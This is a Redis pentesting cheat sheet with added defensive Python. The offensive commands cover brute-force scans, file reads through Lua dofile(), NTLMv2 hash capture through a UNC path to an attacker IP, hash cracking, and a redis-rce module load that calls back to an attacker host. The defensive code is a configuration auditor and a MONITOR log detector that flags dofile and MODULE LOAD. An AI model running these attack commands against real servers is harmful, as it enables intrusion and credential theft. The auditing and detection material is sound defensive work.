6379 - Pentesting redis

nmap

sudo nmap -p 6379 -A $IP
sudo nmap -sV -p 6379 --script=redis-info.nse $IP
sudo nmap -sV -p 6379 --script=redis-brute.nse $IP

enumeration

connect

# sudo apt-get install redis-tools
redis-cli -h $IP
redis-cli -h $IP --pass password1234

redis> info
redis> INFO
redis> client list
redis> CONFIG GET *
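The CONFIG GET * output above is also the quickest way to audit a Redis instance you own. The following is an added example (not from the original page or any of the tools it lists): it parses redis-cli's numbered output and reports the settings that make the rest of this page possible: an empty requirepass, protected-mode off, a wildcard bind, and (Redis 7.0+) enable-module-command. The sample output is constructed, not captured from a real host, and the function names are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of what `redis-cli -h $IP CONFIG GET *` prints (heavily
# truncated), for a server left on defaults. Not captured from any real host.
SAMPLE_CONFIG_GET = """\
 1) "dbfilename"
 2) "dump.rdb"
 3) "requirepass"
 4) ""
 5) "protected-mode"
 6) "no"
 7) "bind"
 8) "0.0.0.0"
 9) "port"
10) "6379"
11) "dir"
12) "/var/lib/redis"
"""

# redis-cli prints each array element as `N) "value"`; CONFIG GET alternates key, value.
_ELEMENT = re.compile(r'^\s*\d+\)\s+"(.*)"\s*$')


def parse_config_get(text: str) -> Dict[str, str]:
    """Turn redis-cli's numbered CONFIG GET output into a {key: value} dict."""
    values: List[str] = [m.group(1) for m in map(_ELEMENT.match, text.splitlines()) if m]
    if len(values) % 2:
        raise ValueError("CONFIG GET output must be key/value pairs")
    return dict(zip(values[0::2], values[1::2]))


def _listens_on_all_interfaces(bind: str) -> bool:
    # No bind directive, or a wildcard entry, means every interface. Redis 7 writes
    # wildcards as "* -::*"; the leading "-" only means "ignore if unavailable".
    if bind.strip() == "":
        return True
    return any(a.lstrip("-") in ("0.0.0.0", "*", "::", "::*") for a in bind.split())


def audit_config(cfg: Dict[str, str]) -> List[str]:
    """Return hardening findings for the settings the enumeration above exposes."""
    findings: List[str] = []
    if not cfg.get("requirepass"):
        findings.append("requirepass is empty: anyone who can reach the port has full access")
    if cfg.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode is off: remote unauthenticated clients are not refused")
    bind = cfg.get("bind", "")
    if _listens_on_all_interfaces(bind):
        findings.append(f"bind={bind!r}: listening on all interfaces")
    # enable-module-command exists from Redis 7.0; when the key is missing the server
    # predates it and MODULE LOAD cannot be switched off by configuration at all.
    modcmd: Optional[str] = cfg.get("enable-module-command")
    if modcmd is None:
        findings.append("enable-module-command not reported (Redis < 7.0): "
                        "MODULE LOAD is always available to an authenticated client")
    elif modcmd.lower() != "no":
        findings.append(f"enable-module-command={modcmd}: MODULE LOAD is enabled")
    return findings


if __name__ == "__main__":
    for finding in audit_config(parse_config_get(SAMPLE_CONFIG_GET)):
        print("[!]", finding)
```

Pipe `redis-cli -h $IP CONFIG GET *` into parse_config_get and run audit_config on the result; an empty list means none of the four settings is flagged. The check deliberately stays on settings CONFIG GET reports; rename-command directives live only in redis.conf and have to be reviewed there.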

exploits

2.8.2402

Redis can execute Lua scripts (in a sandbox, more on that later) via the “EVAL” command. The sandbox allows the dofile() command (WHY???). It can be used to enumerate files and directories. No specific privilege is needed by Redis… If the Lua script is syntactically invalid or attempts to set global variables, the error messages will leak some content of the target file.

  • https://www.agarri.fr/blog/archives/2014/09/11/trying_to_hack_redis_via_http_requests/index.html
  • https://korbinian-spielvogel.de/posts/vulnnet-active-writeup/

access file on server

redis-cli -h $IP
> eval "dofile('C:\\\\Users\\\\enterprise-security\\\\Desktop\\\\user.txt')" 0

obtaining the NTLMv2 Hash / User’s password

Now that we know that we can access files on the server, we can try something more advanced: making the server access a remote share. When the server tries to authenticate to that share it leaks the user's NTLM hash, so if the share is on our machine we can log the authentication attempt and capture the hash.

For that, we first set up a listener using Impacket's Responder.py.

sudo responder -I tun0

Then, we use the redis eval technique to access the exposed share.

redis-cli -h $IP eval "dofile('//10.8.6.103/test')" 0

Crack NTLMv2 hash

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

4.X / 5.X

  • https://github.com/Ridter/redis-rce
  • https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

cd /RedisModules-ExecuteCommand
make

cd /redis-rce
python3 redis-rce.py -r $IP -p 6379 -L 192.168.49.99 -P 6379 -f ../RedisModules-ExecuteCommand/module.so
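Both techniques on this page, the dofile() calls inside EVAL / SCRIPT LOAD (including the UNC path used for NTLM capture) and the module loading the 4.x/5.x tools rely on, are visible as plain commands in the server's MONITOR stream. The following is an added example, not code from the original page or from the projects linked above: it parses redis-cli MONITOR lines (format: unix time, [db client], then each argument in double quotes) and raises an alert for those commands. The sample lines, addresses and timestamps are constructed; the function and rule names are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample of `redis-cli MONITOR` output (timestamps and client addresses
# are made up). MONITOR prints: <unix time> [<db> <client>] "cmd" "arg" ...
SAMPLE_MONITOR = """\
1700000000.100000 [0 10.0.0.5:51000] "GET" "session:42"
1700000000.200000 [0 10.0.0.9:51344] "eval" "dofile('/etc/passwd')" "0"
1700000000.300000 [0 10.0.0.9:51344] "EVAL" "return redis.call('get', KEYS[1])" "1" "k"
1700000000.400000 [0 10.0.0.9:51344] "eval" "dofile('//10.0.0.9/test')" "0"
1700000000.500000 [0 10.0.0.9:51360] "SCRIPT" "LOAD" "dofile('/etc/hosts')"
1700000000.600000 [0 10.0.0.9:51360] "MODULE" "LOAD" "/tmp/module.so"
1700000000.700000 [0 10.0.0.5:51000] "SET" "note" "dofile is only a value here"
"""

_ENTRY = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
_QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Only the dofile() call discussed above is matched; extend the pattern for whatever
# else the Lua sandbox of a given build leaves reachable.
_DOFILE_CALL = re.compile(r"\bdofile\s*\(")
_DOFILE_LITERAL = re.compile(r"""\bdofile\s*\(\s*(['"])(.*?)\1""")


@dataclass
class Alert:
    ts: float
    client: str
    rule: str
    command: str


def parse_monitor_line(line: str) -> Optional[Tuple[float, str, List[str]]]:
    """Split one MONITOR line into (timestamp, client, argv); None if it is not one."""
    m = _ENTRY.match(line)
    if not m:
        return None
    # redis-cli escapes " and \ inside arguments with a backslash; undo just that.
    argv = [re.sub(r"\\(.)", r"\1", a) for a in _QUOTED.findall(m.group("args"))]
    return float(m.group("ts")), m.group("client"), argv


def inspect_command(ts: float, client: str, argv: List[str]) -> Optional[Alert]:
    """Flag Lua scripts that reach for the filesystem and attempts to load a module."""
    if not argv:
        return None
    cmd = argv[0].upper()
    script = None
    if cmd == "EVAL" and len(argv) >= 2:          # EVAL <script> <numkeys> ...
        script = argv[1]
    elif cmd == "SCRIPT" and len(argv) >= 3 and argv[1].upper() == "LOAD":
        script = argv[2]                           # SCRIPT LOAD <script>
    if script is not None and _DOFILE_CALL.search(script):
        lit = _DOFILE_LITERAL.search(script)
        path = lit.group(2) if lit else ""
        # A UNC-style path makes the server open a remote share (the NTLM capture
        # scenario above); anything else is plain file access on the host.
        rule = "lua-remote-share" if path.startswith(("//", "\\\\")) else "lua-file-access"
        return Alert(ts, client, rule, " ".join(argv))
    if cmd == "MODULE" and len(argv) >= 2 and argv[1].upper() == "LOAD":
        return Alert(ts, client, "module-load", " ".join(argv))
    return None


def scan_monitor(text: str) -> List[Alert]:
    """Run inspect_command over every line of a MONITOR capture."""
    alerts: List[Alert] = []
    for line in text.splitlines():
        parsed = parse_monitor_line(line)
        if parsed is not None:
            alert = inspect_command(*parsed)
            if alert is not None:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan_monitor(SAMPLE_MONITOR):
        print(f"{a.ts:.6f} {a.client} {a.rule}: {a.command}")
```

MONITOR adds per-command overhead and is a diagnostic tool, so in practice the same inspect_command logic is better fed from a proxy or network capture in front of Redis. Note that the SET whose value happens to contain the word dofile is not flagged: only script bodies are inspected, which keeps the rule from firing on ordinary data.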